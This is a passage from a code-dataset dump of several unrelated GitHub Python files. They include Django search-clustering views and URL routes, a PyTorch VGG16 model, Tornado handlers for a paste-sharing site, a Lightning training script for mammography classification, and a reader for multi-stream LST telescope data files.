search_results_sentences)\n # bind cluster assignment to the data snippet1 -> url, date, cluster_assignment\n assigned_search_results_cluster = map_cluster_to_data_expanded(search_results_cluster_assignment,\n search_results)\n # get each cluster summary: clust [2]-> summary, clust [3]-> summary\n summarized_clusters = summarize_clusters(bucket_cluster_assignment_sentences)\n\n # Build MM Docs\n G = build_doc_graph(assigned_search_results_cluster, summarized_clusters)\n\n # get mm docs\n mm_doc_sentences = list()\n od = collections.OrderedDict(sorted(summarized_clusters.items()))\n for k, item in od.items():\n mm_doc_sentences.append(item)\n\n mm_doc_sentences_embeddings = get_sentence_embedding(mm_doc_sentences)\n\n # perform agg clust on sentences\n mm_doc_clusters = get_agg_clust_assignment(mm_doc_sentences_embeddings, 15.52)\n # replace cluster assignment to data: clust [1] -> snippet 1, 2, .....\n bucket_of_mm_doc_cluster = map_cluster_to_data(mm_doc_clusters, mm_doc_sentences)\n # For Summarization\n summarized_mm_doc_clusters = summarize_clusters(bucket_of_mm_doc_cluster)\n # bind cluster assignment to the data mm_doc_1 -> cluster_assignment\n expanded_dict_of_mm_clusters = map_cluster_to_doc_expanded(mm_doc_clusters, od)\n\n # replace cluster with summary data\n # building graph\n G = connect_mm_doc_to_clusters(G, expanded_dict_of_mm_clusters, summarized_mm_doc_clusters)\n expand_view(G)\n # Wait for result from all processes\n # snip_view_process.join()\n\n clust_view = read_json('clust_view')\n doc_view = read_json('doc_view')\n snip_view = read_json('snip_view')\n\n wikilook = \"\"\n # Change view depending on the granularity selected\n if lookup_level == 'doc' or True:\n return render(request, 'content_doc.html',\n {'clusters': clust_view, 'documents': doc_view, 'snippets': snip_view})\n elif lookup_level == 'snip':\n snip_view = format_for_gallery(snip_view)\n # full_text_search = \"Mcdonald\"\n\n import string\n full_text_search = full_text_search.translate(str.maketrans('', '', string.punctuation))\n import spacy\n sp = spacy.load('en_core_web_sm')\n sen = sp(full_text_search)\n\n lookup = \"\"\n\n for word in sen:\n if word.pos_ == \"NOUN\" or word.pos_ == \"PROPN\":\n lookup = lookup + word.text + \" \"\n\n # from textblob import TextBlob\n # wiki = TextBlob(full_text_search)\n # print(wiki.noun_phrases)\n lookup = lookup.split(' ')[0]\n\n try:\n import requests\n response = requests.get(\"http://en.wikipedia.org/w/api.php?action=query&prop=description&titles=\" +\n lookup +\n \"&prop=extracts&exintro&explaintext&format=json&redirects&callback=?\")\n\n # summary = response.json()\n test = response.content.decode(\"UTF-8\")\n test = test[5:len(test) - 1]\n j = json.loads(test)\n y = j['query']['pages'].popitem()\n wikilook = y[1]['extract']\n\n wikilook = {\n 'query': lookup,\n 'content': wikilook.replace('. ', '.
')\n }\n finally:\n if wikilook:\n return render(request, 'content_snip.html',\n {'clusters': clust_view, 'documents': doc_view, 'snippets': snip_view, 'wiki': wikilook})\n else:\n return render(request, 'content_snip.html',\n {'clusters': clust_view, 'documents': doc_view, 'snippets': snip_view})\n else:\n return render(request, 'content.html', {'clusters': clust_view, 'documents': doc_view, 'snippets': snip_view})\n\n\ndef get_document_preview(request):\n # TODO Update the doc review panel to take into consideration of the UUID\n doc_id = request.GET['doc_id']\n doc_view = read_json('doc_view')\n snip_view = read_json('snip_view')\n snip_list = doc_view[doc_id]['snips_list']\n\n snippets = []\n for snip_id in snip_list:\n snippets.append(snip_view[snip_id])\n\n return TemplateResponse(request, 'doct_preview.html',\n {'doc_id': doc_id, 'documents': doc_view, 'snippets': snip_view, 'snip_list': snippets})\n # return HttpResponse(all_snippets(snip_view, snip_list, 0))\n\n\ndef homepage(request):\n return render(request, 'start_page.html', {})\n\n# TODO Hide explore more cluster when it is empty\n# Case 1: When it is all empty including no further multimedia documents to explore\n# Case2: When only explore more cluster is empty yet there are multimedia documents further to explore\n# TODO: Decrease the markjs highlight opacity\n#TODO: delay the exectuion of the date and engine button if the query is newly typed.\n#TODO: Error when organic results not found on the following req [30/Sep/2020 11:55:08] \"GET /?lookup=clust&ft_search=Pakistan¬Input=coronavirus&sdate=08/01/2020&edate=08/31/2020 HTTP/1.1\" 500 90430\n","repo_name":"HQuser/arkamed","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18955180913","text":"import os\nfrom django.contrib import admin\nfrom django.conf.urls.defaults import *\nimport treebeard\nfrom tbexample.views import convo, load_random_data, delete_node, delete_all\nfrom tbexample.views import choose\n\nadmin.autodiscover()\n\nbaseurl = r'^(?Pmp|al|ns)/'\nlurls = [\n (r'loaddata/$', load_random_data, 'load-data'),\n (r'delete_all/$', delete_all, 'delete-all'),\n (r'(?P\\d+)/delete/$', delete_node, 'delete-node'),\n (r'(?P\\d+)/reply/$', convo, 'reply-view'),\n (r'(?P\\d+)/$', convo, 'node-view'),\n (r'$', convo, 'main-view')\n]\n\npath = os.path.dirname(treebeard.__file__)\nstatic_path = os.path.normpath(os.path.join(path, 'static/'))\n\nurlpatterns = patterns('',\n (r'^admin/', include(admin.site.urls)),\n (r'^static/(?P.*)$', 'django.views.static.serve',\n {'document_root': static_path, 'show_indexes': True}))\n\nfor pat, view, name in lurls:\n urlpatterns += patterns('', url('%s%s' % (baseurl, pat), view, name=name))\nurlpatterns += patterns('', url('^$', choose, name='choose-tree'))\n","repo_name":"bluearth/tbpoly","sub_path":"tbexample/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"25743995780","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\n \nclass VGG16(nn.Module):\n def __init__(self,num_classes=10, if_dropout=True):\n super(VGG16, self).__init__()\n \n self.if_dropout = if_dropout\n self.conv1 = nn.Conv2d(3, 64, kernel_size=3, padding=1)#64 32 32\n self.bn1 = nn.BatchNorm2d(64)\n self.relu1 = nn.ReLU(inplace=False)\n self.conv2 = 
nn.Conv2d(64, 64, kernel_size=3, padding=1)#64 32 32\n self.bn2 = nn.BatchNorm2d(64)\n self.relu2 = nn.ReLU(inplace=False)\n self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2)#64 16 16\n self.conv3 = nn.Conv2d(64, 128, kernel_size=3, padding=1)#128 16 16\n self.bn3 = nn.BatchNorm2d(128)\n self.relu3 = nn.ReLU(inplace=False)\n self.conv4 = nn.Conv2d(128, 128, kernel_size=3, padding=1)#128 16 16\n self.bn4 = nn.BatchNorm2d(128)\n self.relu4 = nn.ReLU(inplace=False)\n self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2)#128 8 8\n self.conv5 = nn.Conv2d(128, 256, kernel_size=3, padding=1)#256 8 8\n self.bn5 = nn.BatchNorm2d(256)\n self.relu5 = nn.ReLU(inplace=False)\n self.conv6 = nn.Conv2d(256, 256, kernel_size=3, padding=1)#256 8 8\n self.bn6 = nn.BatchNorm2d(256)\n self.relu6 = nn.ReLU(inplace=False)\n self.conv7 = nn.Conv2d(256, 256, kernel_size=3, padding=1)#256 8 8\n self.bn7 = nn.BatchNorm2d(256)\n self.relu7 = nn.ReLU(inplace=False)\n self.pool3 = nn.MaxPool2d(kernel_size=2, stride=2)#256 4 4\n self.conv8 = nn.Conv2d(256, 512, kernel_size=3, padding=1)#512 4 4\n self.bn8 = nn.BatchNorm2d(512)\n self.relu8 = nn.ReLU(inplace=False)\n self.conv9 = nn.Conv2d(512, 512, kernel_size=3, padding=1)#512 4 4\n self.bn9 = nn.BatchNorm2d(512)\n self.relu9 = nn.ReLU(inplace=False)\n self.conv10 = nn.Conv2d(512, 512, kernel_size=3, padding=1)#512 4 4\n self.bn10 = nn.BatchNorm2d(512)\n self.relu10 = nn.ReLU(inplace=False)\n self.pool4 = nn.MaxPool2d(kernel_size=2, stride=2)#512 2 2\n self.conv11 = nn.Conv2d(512, 512, kernel_size=3, padding=1)#512 2 2\n self.bn11 = nn.BatchNorm2d(512)\n self.relu11 = nn.ReLU(inplace=False)\n self.conv12 = nn.Conv2d(512, 512, kernel_size=3, padding=1)#512 2 2\n self.bn12 = nn.BatchNorm2d(512)\n self.relu12 = nn.ReLU(inplace=False)\n self.conv13 = nn.Conv2d(512, 512, kernel_size=3, padding=1)#512 2 2\n self.bn13 = nn.BatchNorm2d(512)\n self.relu13 = nn.ReLU(inplace=False)\n self.pool5 = nn.MaxPool2d(kernel_size=2, stride=2)#512 1 1\n self.fc1 = nn.Linear(512, num_classes)\n \n self.drop= nn.Dropout( p = 0.3)\n \n def forward(self,x):\n feature_dict = {}\n \n feat_conv1 = self.conv1(x)\n feat_bn1 = self.bn1(feat_conv1)\n feat_conv1_relu = self.relu1(feat_bn1)\n feat_conv2 = self.conv2(feat_conv1_relu)\n feat_bn2 = self.bn2(feat_conv2)\n feat_conv2_relu = self.relu2(feat_bn2)\n feat_pool1 = self.pool1(feat_conv2_relu)\n \n feat_conv3 = self.conv3(feat_pool1)\n feat_bn3 = self.bn3(feat_conv3)\n feat_conv3_relu = self.relu3(feat_bn3)\n feat_conv4 = self.conv4(feat_conv3_relu)\n feat_bn4 = self.bn4(feat_conv4)\n feat_conv4_relu = self.relu4(feat_bn4)\n feat_pool2 = self.pool2(feat_conv4_relu)\n \n feat_conv5 = self.conv5(feat_pool2)\n feat_bn5 = self.bn5(feat_conv5)\n feat_conv5_relu = self.relu5(feat_bn5)\n feat_conv6 = self.conv6(feat_conv5_relu)\n feat_bn6 = self.bn6(feat_conv6)\n feat_conv6_relu = self.relu6(feat_bn6)\n feat_conv7 = self.conv7(feat_conv6_relu)\n feat_bn7 = self.bn7(feat_conv7)\n feat_conv7_relu = self.relu7(feat_bn7)\n feat_pool3 = self.pool3(feat_conv7_relu)\n \n feat_conv8 = self.conv8(feat_pool3)\n feat_bn8 = self.bn8(feat_conv8)\n feat_conv8_relu = self.relu8(feat_bn8)\n feat_conv9 = self.conv9(feat_conv8_relu)\n feat_bn9 = self.bn9(feat_conv9)\n feat_conv9_relu = self.relu9(feat_bn9)\n feat_conv10 = self.conv10(feat_conv9_relu)\n feat_bn10 = self.bn10(feat_conv10)\n feat_conv10_relu = self.relu10(feat_bn10)\n feat_pool4 = self.pool4(feat_conv10_relu)\n \n feat_conv11 = self.conv11(feat_pool4)\n feat_bn11 = self.bn11(feat_conv11)\n feat_conv11_relu = 
self.relu11(feat_bn11)\n feat_conv12 = self.conv12(feat_conv11_relu)\n #feat_conv12 = self.conv12(feat_pool4)\n feat_bn12 = self.bn12(feat_conv12)\n feat_conv12_relu = self.relu12(feat_bn12)\n feat_conv13 = self.conv13(feat_conv12_relu)\n feat_bn13 = self.bn13(feat_conv13)\n feat_conv13_relu = self.relu13(feat_bn13)\n feat_pool5 = self.pool5(feat_conv13_relu)\n \n feat_pool5 = feat_pool5.view(feat_pool5.size(0),-1)\n \n \n after_dropout= self.drop(feat_pool5)\n\n feat_fc1 = self.fc1(after_dropout)\n \n return feat_fc1\n","repo_name":"ltl7155/NPC","sub_path":"deephunter/models/vgg_cifar10.py","file_name":"vgg_cifar10.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"39017593583","text":"# Created by Chen at 12/18/22\nfrom torch_geometric.graphgym.register import register_config\nfrom yacs.config import CfgNode as CN\n\n\n@register_config('vn_cfg')\ndef vn_cfg(cfg):\n \"\"\"Deepset VN config\n \"\"\"\n cfg.dsvn = CN()\n cfg.dsvn.reduction='mean'\n cfg.dsvn.nonlinear='relu'\n cfg.dsvn.n_layers = 1\n cfg.dsvn.batchnorm = True\n\n\n\n","repo_name":"Chen-Cai-OSU/MPNN-GT-Connection","sub_path":"GraphGPS/graphgps/config/vn_config.py","file_name":"vn_config.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"67"} +{"seq_id":"28188796759","text":"# -*- coding: utf-8 *-*\nimport re\nimport motor\nimport bcrypt\nimport datetime\nimport traceback\nimport tornado.gen\nimport tornado.web\nimport simplejson as json\nfrom bson import json_util\nfrom tpaste import messages, forms\nfrom tpaste.helpers import stringhelper, mailhelper\n\n\nclass BaseMultiDict(object):\n\n def __init__(self, handler):\n self.handler = handler\n\n def __iter__(self):\n return iter(self.handler.request.arguments)\n\n def __len__(self):\n return len(self.handler.request.arguments)\n\n def __contains__(self, name):\n return (name in self.handler.request.arguments)\n\n def getlist(self, name):\n return self.handler.get_arguments(name, strip=False)\n\n\nclass TPasteHandler(tornado.web.RequestHandler):\n\n @property\n def db(self):\n return self.application.db\n\n @property\n def smtp(self):\n return self.application.smtp\n\n def __init__(self, *args, **kwargs):\n super(TPasteHandler, self).__init__(*args, **kwargs)\n\n def get_dict_arguments(self):\n return BaseMultiDict(self)\n\n def write_error(self, status_code, **kwargs):\n params = {}\n if self.settings.get('debug') and 'exc_info' in kwargs:\n params['stack_trace'] = ''.join([line for line in\n traceback.format_exception(*kwargs['exc_info'])])\n if status_code in messages.errors.keys():\n self.render('error.html', message=messages.errors[status_code],\n **params)\n else:\n self.write('Error no manejado. 
' + str(self._status_code))\n\n def write_json(self, content):\n self.write(json.dumps(content, default=json_util.default))\n\n def write_ajax_response(self, message, action=\"content\"):\n self.write_json({\"action\": action, \"message\": message})\n\n def write_ajax_redirect(self, url):\n self.write_ajax_response(url, action=\"redirect\")\n\n def write_ajax_error(self, error):\n self.write_ajax_response(error, action=\"error\")\n\n\nclass NotFoundHandler(TPasteHandler):\n\n def get(self):\n raise tornado.web.HTTPError(404)\n\n\nclass HomeHandler(TPasteHandler):\n\n def get(self):\n lang = self.get_argument('lang', None)\n if lang not in messages.languages.keys() + [None]:\n raise tornado.web.HTTPError(404)\n self.render('home.html', lang=lang)\n\n\nclass SupportedLanguagesHandler(TPasteHandler):\n\n def get(self):\n self.render(\"languages.html\", languages=messages.languages)\n\n\nclass LanguageHandler(TPasteHandler):\n\n @tornado.web.asynchronous\n @tornado.gen.engine\n def get(self, language):\n language = language.replace(' ', '+')\n if language not in messages.languages:\n raise tornado.web.HTTPError(404,\n '%s is a unsupported language.' % language)\n cursor = self.db.snippets.find({'syntax': language},\n sort=[('date', -1)], limit=20)\n snippets = yield motor.Op(cursor.to_list)\n self.render('language.html', snippets=snippets, lang_code=language,\n lang_name=messages.languages[language])\n\n\nclass NewSnippetHandler(TPasteHandler):\n\n @tornado.web.asynchronous\n @tornado.gen.engine\n def post(self):\n form = forms.NewSnippetForm(self.get_dict_arguments())\n if not form.validate():\n self.write(form.errors)\n self.finish()\n else:\n while True:\n token = stringhelper.random_base62()\n s = yield motor.Op(self.db.snippets.find_one, {'token': token},\n fields={'_id': 1})\n if not s:\n break\n snippet = {'title': self.get_argument('title'),\n 'syntax': self.get_argument('syntax'),\n 'content': self.get_argument('content'),\n 'token': token,\n 'date': datetime.datetime.now()}\n if self.current_user:\n snippet['author'] = self.current_user['']\n else:\n snippet['author'] = self.get_argument('author')\n yield motor.Op(self.db.snippets.insert, snippet)\n self.redirect('/%s' % token)\n\n\nclass SnippetHandler(TPasteHandler):\n\n @tornado.web.asynchronous\n @tornado.gen.engine\n def get(self, token=None):\n if token:\n snippet = yield motor.Op(self.db.snippets.find_one,\n {'token': token})\n else:\n snippet = yield motor.Op(self.db.snippets.find_one, {},\n sort=[('date', -1)])\n if not 'html' in snippet:\n from pygments import highlight\n from pygments.lexers import get_lexer_by_name\n from pygments.formatters import HtmlFormatter\n lexer = get_lexer_by_name(snippet['syntax'], stripall=True)\n formatter = HtmlFormatter(linenos=True, cssclass='source')\n snippet['html'] = highlight(snippet['content'], lexer, formatter)\n yield motor.Op(self.db.snippets.save, snippet)\n self.render('snippet.html', snippet=snippet)\n\n\nclass RawSnippetHandler(TPasteHandler):\n\n @tornado.web.asynchronous\n @tornado.gen.engine\n def get(self, token):\n snippet = yield motor.Op(self.db.snippets.find_one, {'token': token})\n if not snippet:\n raise tornado.web.HTTPError(404)\n else:\n self.set_header('Content-Type', 'text/plain')\n self.write(snippet['content'])\n self.finish()\n\n\nclass SearchSnippetHandler(TPasteHandler):\n\n @tornado.web.asynchronous\n @tornado.gen.engine\n def get(self):\n term = self.get_argument('term', '')\n if not term:\n self.render('search.html', snippets=[])\n self.finish()\n regex = 
re.compile('.*' + term + '.*', re.IGNORECASE)\n cursor = self.db.snippets.find({'title': regex}, sort=[('title', 1)])\n snippets = yield motor.Op(cursor.to_list)\n self.render('search.html', snippets=snippets)\n\n\nclass RegistrationHandler(TPasteHandler):\n\n def get(self):\n if self.current_user:\n self.redirect('/')\n self.render('registration.html')\n\n @tornado.web.asynchronous\n @tornado.gen.engine\n def post(self):\n if self.current_user:\n self.redirect('/')\n form = forms.RegistrationForm(self.get_dict_arguments())\n if form.validate():\n user = {\n 'username': self.get_argument('username_reg'),\n 'email': self.get_argument('email_reg'),\n 'password': self.get_argument('password_reg'),\n 'status': 'registered',\n 'join': {\n 'date': datetime.datetime.now(),\n 'token': stringhelper.generate_md5()\n },\n \"recover\": {}\n }\n u = yield motor.Op(self.db.users.find_one,\n {'$or': [{'username': user['username']},\n {'email': user['email']}]}, fields={'_id': 1})\n if u:\n self.write_ajax_error(\n {'email_reg': [messages.registered_email]})\n self.finish()\n else:\n user['password'] = bcrypt.hashpw(user['password'],\n bcrypt.gensalt())\n message = mailhelper.BaseEmailMessage(user['email'],\n messages.confirm_registration,\n 'registration.html',\n connection=self.smtp,\n user=user\n )\n yield tornado.gen.Task(message.send)\n yield motor.Op(self.db.users.insert, user)\n self.render(\"showmessage.html\",\n message=messages.confirmregistration)\n else:\n self.write_ajax_error(form.errors)\n self.finish()\n\n\nclass RegistrationSuccessfullyHandler(TPasteHandler):\n\n def get(self):\n if self.current_user:\n self.redirect('/')\n self.render('showmessage.html',\n message=messages.registrationsuccessfully)\n\n\nclass LoginHandler(TPasteHandler):\n\n def get(self):\n if self.current_user:\n self.redirect('/')\n self.render('login.html', email=None, message=None,\n _next=self.get_argument('next', '/'))\n\n @tornado.web.asynchronous\n def post(self):\n pass\n\n\nclass LogoutHandler(TPasteHandler):\n\n def get(self):\n self.redirect('/')\n\n def post(self):\n if self.current_user:\n self.clear_cookie('current_user')\n self.redirect('/')\n\n\nclass RecoverPasswordHandler(TPasteHandler):\n\n def get(self):\n if not self.current_user:\n self.render('recoverpassword.html')\n else:\n self.redirect('/')\n\n def post(self):\n pass\n","repo_name":"puentesarrin/tpaste","sub_path":"tpaste/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":8769,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"34264777770","text":"import argparse\nimport os\nfrom datetime import timedelta\nfrom glob import glob\n\nimport pandas as pd\nimport tables\nimport wandb\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom pytorch_lightning.loggers import WandbLogger\nfrom torch.utils.data import IterableDataset, WeightedRandomSampler\n\nfrom datasets import getDatasets, GenericCollate\nimport pytorch_lightning as pl\n#from torchsample.samplers import StratifiedSampler\n\n# needed for the caching hack implemented in the dataset ....\nimport torch.multiprocessing\ntorch.multiprocessing.set_sharing_strategy('file_system')\nfrom models import EndToEnd_AMIL\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-gpu\", default='0', type=str)\n parser.add_argument(\"--bs\", default=4, type=int)\n parser.add_argument(\"-maxEpochs\", default=200, type=int)\n parser.add_argument(\"--backbone\", 
default='xcit_nano_12_p16_224_dist')\n #parser.add_argument(\"--backbone\", default='mobilenetv3_small_075')\n #parser.add_argument(\"-quarter\", action=\"store_true\")\n #parser.add_argument(\"-tenth\", action=\"store_true\")\n #parser.add_argument(\"-sampler\", default='half', choices=['half', 'quarter', 'tenth'])\n parser.add_argument(\"--sampler\", default=16.0, type=float)\n parser.add_argument(\"--lr\", default=0.001, type=float) # FIXME\n parser.add_argument(\"--reducedDim\", default=64, type=int)\n parser.add_argument(\"--hiddenAttn\", default=0, type=int)\n parser.add_argument(\"--opt\", default='sgd')\n parser.add_argument(\"-wandb\", default='mamm-end2end-amil')\n #parser.add_argument(\"--lossFun\", default='focal')\n #parser.add_argument(\"--lossFun\", default='BCE_F')\n parser.add_argument(\"--lossFun\", default='BCE')\n #parser.add_argument(\"--gated\", action='store_true') # ugh\n parser.add_argument(\"--gated\", default=False)\n parser.add_argument(\"--noise\", type=float, default=0.0)\n parser.add_argument(\"--dropout\", type=float, default=0.25)\n parser.add_argument(\"--weightDecay\", type=float, default=0.0)\n parser.add_argument(\"--l1\", type=float, default=0.0)\n parser.add_argument(\"--focalAlpha\", type=float, default=0.95)\n parser.add_argument(\"--focalGamma\", type=float, default=2.0)\n parser.add_argument(\"--focalReduction\", type=str, default='sum')\n parser.add_argument(\"--tileLimit\", type=int, default=8)\n parser.add_argument(\"--colorize\", type=int, default=2)\n parser.add_argument(\"--model\", default='MAX')\n #parser.add_argument(\"-l1norm\", action='store_true')\n args = parser.parse_args()\n\n if args.lossFun.lower() != 'focal':\n args.focalAlpha, args.focalGamma, args.focalReduction = None, None, None\n\n #args.gated = True # FIXME\n #if args.gated.lower() == 'true': args.gated = True\n #elif args.gated.lower() == 'false': args.gated = False\n\n trainDataset, valDataset = getDatasets(args)\n\n print('train/val split : ', trainDataset.imagesDF.shape, valDataset.imagesDF.shape)\n\n tiles, lbl = trainDataset[0]\n print(tiles)\n print(lbl)\n\n\n labels = torch.from_numpy(trainDataset.imagesDF.cancer.to_numpy())\n\n if args.sampler == 0:\n raise ValueError('Dont')\n sampler = None\n else:\n class_count = list(trainDataset.imagesDF.cancer.value_counts())\n class_count[1] = args.sampler * class_count[1] # overweight the positive cases. If sampler=1.0, then its trained 50/50\n print(class_count)\n class_weights = 1. 
/ torch.tensor(class_count, dtype=torch.float)\n print(class_weights)\n class_weights_all = class_weights[labels]\n print(class_weights_all)\n sampler = WeightedRandomSampler(weights=class_weights_all, num_samples=len(class_weights_all), replacement=True)\n\n trainCollate = GenericCollate(training=True)\n valCollate = GenericCollate(training=False)\n\n trainDataloader = torch.utils.data.DataLoader(trainDataset, batch_size=args.bs, persistent_workers=True,\n shuffle=False, drop_last=False, num_workers=2, collate_fn=trainCollate, sampler=sampler)\n\n valDataloader = torch.utils.data.DataLoader(valDataset, batch_size=1, persistent_workers=True,\n shuffle=True, drop_last=False, num_workers=2, collate_fn=valCollate)\n\n '''\n if args.wandb:\n run = wandb.init(project=args.wandb)\n conf = run.config\n conf.backbone = args.backbone\n del args.wandb\n wandb.config.update(args)\n #print(run.name)\n name = run.name\n else:\n run, name = None, None\n '''\n\n wandb_logger = WandbLogger(project=args.wandb)\n del args.wandb\n wandb_logger.log_hyperparams(args)\n name = wandb_logger.experiment.name\n run=None\n\n\n checkpoint_callback = ModelCheckpoint(\n dirpath=f\"/fast/rsna-breast/checkpoints/AMIL_end2end/{args.backbone}/{name}/\",\n save_top_k=2, monitor=\"score\", mode='max', train_time_interval=timedelta(minutes=10)\n )\n\n dev = args.gpu if torch.cuda.is_available() else 0\n if ',' not in dev: dev=[int(dev)]\n else: dev = [int(g) for g in dev.split(',')]\n\n trainer = pl.Trainer(max_epochs=args.maxEpochs, callbacks=[checkpoint_callback],\n logger=wandb_logger, log_every_n_steps=10,\n accelerator='gpu',\n #devices=[dev],\n devices=dev,\n #val_check_interval=0.1,\n #val_check_interval=10,\n #limit_train_batches=1024,\n limit_train_batches=64,\n #limit_val_batches=256, # 11k validation images, so this is 1/43 of the validation set\n #limit_val_batches=512,\n num_sanity_val_steps=1,\n accumulate_grad_batches=16,\n #accumulate_grad_batches=128,\n #check_val_every_n_epoch=512,\n )\n\n model = EndToEnd_AMIL(args, model=args.model, backbone=args.backbone, wandbRun=run, opt=args.opt, lr=args.lr,\n nReduced=args.reducedDim, nHiddenAttn=args.hiddenAttn, lossFun=args.lossFun,\n gated=args.gated, dropout=args.dropout, weightDecay=args.weightDecay, l1_lambda=args.l1,\n focalAlpha=args.focalAlpha, focalGamma=args.focalGamma, focalReduction=args.focalReduction\n )\n\n #chkpts = '/fast/rsna-breast/checkpoints/tileClassifier'\n #chkpt = f'{chkpts}/deit3_small_patch16_224_sweepy-sweep-45/epoch=83-step=21270.ckpt'\n\n chkpt = '/fast/rsna-breast/checkpoints/tileClassifier/xcit_nano_12_p16_224_dist_polished-leaf-74/epoch=17-step=10549.ckpt'\n\n stateDict = torch.load(chkpt)['state_dict']\n #print(stateDict.keys())\n #model.encoder.load_state_dict(stateDict, strict=False)\n\n trainer.fit(model=model, train_dataloaders=trainDataloader, val_dataloaders=valDataloader)\n #trainer.fit(model=model, train_dataloaders=trainDataloader)\n\n\n\n","repo_name":"cjmielke/rsna-mammography","sub_path":"AMIL_end2end/trainLightning.py","file_name":"trainLightning.py","file_ext":"py","file_size_in_byte":6982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1776383467","text":"import re\nfrom pathlib import Path\nfrom collections import namedtuple, defaultdict\nfrom itertools import count\nfrom dataclasses import dataclass, field\nfrom typing import Any\nfrom queue import PriorityQueue, Empty\n\nfrom ctapipe.core import Component, Provenance\nfrom ctapipe.core.traits import 
Bool, Integer\nfrom protozfits import File\n\n__all__ = ['MultiFiles']\n\n\nFileInfo = namedtuple(\"FileInfo\", \"tel_id run subrun stream extra\")\nR0_RE = re.compile(r\"LST-(\\d+)\\.(\\d+)\\.Run(\\d+)\\.(\\d+)(.*)\\.fits\\.fz\")\nR0_PATTERN = \"LST-{tel_id}.{stream}.Run{run:05d}.{subrun:04d}{extra}.fits.fz\"\n\n@dataclass(order=True)\nclass NextEvent:\n \"\"\"Class to get sorted access to events from multiple files\"\"\"\n priority: int\n event: Any = field(compare=False)\n stream: int = field(compare=False)\n\n\ndef _parse_match(match):\n groups = list(match.groups())\n values = [int(v) for v in groups[:4]]\n return FileInfo(tel_id=values[0], run=values[2], subrun=values[3], stream=values[1], extra=groups[4])\n\n\ndef get_file_info(path):\n \"\"\"Generic function to search a filename for the LST-t.s.Runxxxxx.yyyy\"\"\"\n path = Path(path)\n m = R0_RE.match(path.name)\n if m is None:\n raise ValueError(f\"Filename {path} does not include pattern {R0_RE}\")\n\n return _parse_match(m)\n\n\nclass MultiFiles(Component):\n '''Open multiple stream files and iterate over events in order'''\n\n all_streams = Bool(\n default_value=True,\n help=(\n \"If true, try to open all streams in parallel.\"\n \" Only applies when given file matches the expected naming pattern and is stream 1.\"\n )\n ).tag(config=True)\n\n all_subruns = Bool(\n default_value=False,\n help=(\n \"If true, try to iterate over all subruns.\"\n \" Only applies when file matches the expected naming pattern and subrun is 0\"\n )\n ).tag(config=True)\n\n last_subrun = Integer(\n default_value=None,\n allow_none=True,\n help=\"If not None, stop loading new subruns after ``last_subrun`` (inclusive)\"\n ).tag(config=True)\n\n def __init__(self, path, *args, **kwargs):\n \"\"\"\n Create a new MultiFiles object from an iterable of paths\n\n Parameters\n ----------\n paths: Iterable[string|Path]\n The input paths\n \"\"\"\n super().__init__(*args, **kwargs)\n self.path = Path(path)\n if not self.path.is_file():\n raise IOError(f\"input path {path} is not a file\")\n\n self.directory = self.path.parent\n self.current_subrun = None\n\n try:\n file_info = get_file_info(self.path)\n except ValueError:\n file_info = None\n\n if file_info is not None:\n if file_info.stream != 1:\n self.log.info(\"Input file has stream != 1, not loading more streams or subruns\")\n self.all_streams = False\n self.all_subruns = False\n\n self.current_subrun = defaultdict(lambda: self.file_info.subrun - 1)\n else:\n self.log.warning(\"Input file does not match LST name pattern, not trying to load more streams or subruns\")\n self.all_subruns = False\n self.all_streams = False\n\n self.file_info = file_info\n self._files = {}\n self._events = PriorityQueue()\n self._events_tables = {}\n self._headers = {}\n self.camera_config = None\n self.dvr_applied = None\n\n if self.all_streams and file_info is not None:\n for stream in count(1):\n try:\n self._load_next_subrun(stream)\n except IOError:\n break\n else:\n self._load_next_subrun(None)\n\n if len(self._files) == 0:\n raise IOError(f\"No file loaded for path {path}\")\n\n @property\n def n_open_files(self):\n return len(self._files)\n\n def _load_next_subrun(self, stream):\n \"\"\"Open the next (or first) subrun.\n\n Parameters\n ----------\n stream : int or None\n If None, assume the single-file case and just open it.\n \"\"\"\n if self.file_info is None and stream is not None:\n raise ValueError(\"Input path does not allow automatic subrun loading\")\n\n if stream is None:\n path = self.path\n else:\n 
self.current_subrun[stream] += 1\n\n if self.last_subrun is not None and self.current_subrun[stream] > self.last_subrun:\n self.log.info(\"Stopping loading of subruns because of last_subrun\")\n return\n\n path = self.directory / R0_PATTERN.format(\n tel_id=self.file_info.tel_id,\n run=self.file_info.run,\n subrun=self.current_subrun[stream],\n stream=stream,\n extra=self.file_info.extra,\n )\n\n if not path.is_file():\n raise FileNotFoundError(f\"File {path} does not exist\")\n\n if stream in self._files:\n self._files.pop(stream).close()\n\n Provenance().add_input_file(str(path), \"R0\")\n file_ = File(str(path))\n self._files[stream] = file_\n self.log.info(\"Opened file %s\", path)\n self._events_tables[stream] = file_.Events\n self._headers[stream] = self._events_tables[stream].header\n dvr_applied = self._headers[stream].get(\"LSTDVR\", False)\n if self.dvr_applied is None:\n self.dvr_applied = dvr_applied\n elif dvr_applied != self.dvr_applied:\n raise IOError(\"Mixing subruns / streams with and without DVR applied is not supported\")\n\n # load first event from each stream\n event = next(self._events_tables[stream])\n self._events.put_nowait(NextEvent(event.event_id, event, stream))\n\n # make sure we have a camera config\n if hasattr(file_, \"CameraConfig\"):\n config = next(file_.CameraConfig)\n self.cta_r1 = False\n else:\n # new files use CameraConfiguration\n self.cta_r1 = True\n config = next(file_.CameraConfiguration)\n \n if self.camera_config is None:\n self.camera_config = config\n\n def close(self):\n '''Close the underlying files'''\n for f in self._files.values():\n 